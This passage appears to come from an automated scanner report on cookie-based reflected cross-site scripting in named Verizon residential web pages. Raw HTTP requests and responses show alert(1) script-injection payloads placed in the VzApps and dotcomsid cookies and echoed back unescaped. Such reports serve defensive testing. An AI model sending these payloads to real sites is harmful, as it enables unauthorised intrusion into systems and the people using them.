Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdcef1'><script>alert(1)</script>614ae10fb65; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 02:56:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:27 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=TXdcef1'><script>alert(1)</script>614ae10fb65; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:27 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDCEF1'><SCRIPT>ALERT(1)</SCRIPT>614AE10FB65 ' />
...[SNIP]...

2.977. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6fd"-alert(1)-"6d30b2026af was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=bb6fd"-alert(1)-"6d30b2026af; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 108514
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:23 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "bb6fd"-alert(1)-"6d30b2026af"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: docu
...[SNIP]...

2.978. https://www22.verizon.com/Residential/FiOSTV/Check_Availability/Check_Availability.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Check_Availability/Check_Availability.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d6663'><script>alert(1)</script>7127b0cbbb7 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Check_Availability/Check_Availability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd6663'><script>alert(1)</script>7127b0cbbb7; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 58577
Expires: Sat, 20 Nov 2010 02:52:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:52:21 GMT
Connection: close
Set-Cookie: ContextInfo_LoopQual=; path=/
Set-Cookie: ContextInfo_State=TXd6663'><script>alert(1)</script>7127b0cbbb7; path=/


<html xmlns:vz>
<head id="_ctl0_head"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><title>
   Verizon | FiOS TV Availability
</title>
<style>
.channel_list .essent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD6663'><SCRIPT>ALERT(1)</SCRIPT>7127B0CBBB7 ' />
...[SNIP]...

2.979. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7319b'><script>alert(1)</script>b412aee3463 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX7319b'><script>alert(1)</script>b412aee3463; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 02:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX7319b'><script>alert(1)</script>b412aee3463; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:56:51 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7319B'><SCRIPT>ALERT(1)</SCRIPT>B412AEE3463 ' />
...[SNIP]...

2.980. https://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226d7"-alert(1)-"1d917d73025 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
